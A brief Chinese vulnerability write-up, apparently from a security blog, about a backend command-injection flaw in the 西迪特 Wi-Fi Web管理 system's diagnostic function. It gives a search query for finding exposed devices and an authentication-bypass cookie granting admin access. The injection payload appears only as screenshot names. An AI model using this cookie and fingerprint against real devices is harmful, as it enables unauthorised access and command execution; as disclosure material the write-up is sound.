西迪特 Wi-Fi Web管理 jumpto.php 后台命令执行漏洞

漏洞描述

西迪特 Wi-Fi Web管理系统后台过滤不足导致远程命令执行漏洞。

漏洞影响

西迪特 Wi-Fi Web管理

网络测绘

title==”Wi-Fi Web管理”

漏洞复现

登录页面

20240325113743471-1629371298672-1ceeafe8-ba9c-42c5-b873-3dfabdd0305a.5dcb2657_2024-03-25_11-37-17 (1)

通过越权漏洞获取权限,添加Cookie

Cookie: timestamp=0; cooLogin=1; cooUser=admin

进入后台后,诊断功能点存在命令拼接执行漏洞

20240325114103217-1629371484536-e600bfcf-053f-420b-b31c-8d3dc6c9843e.5a1b5097_2024-03-25_11-40-39 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容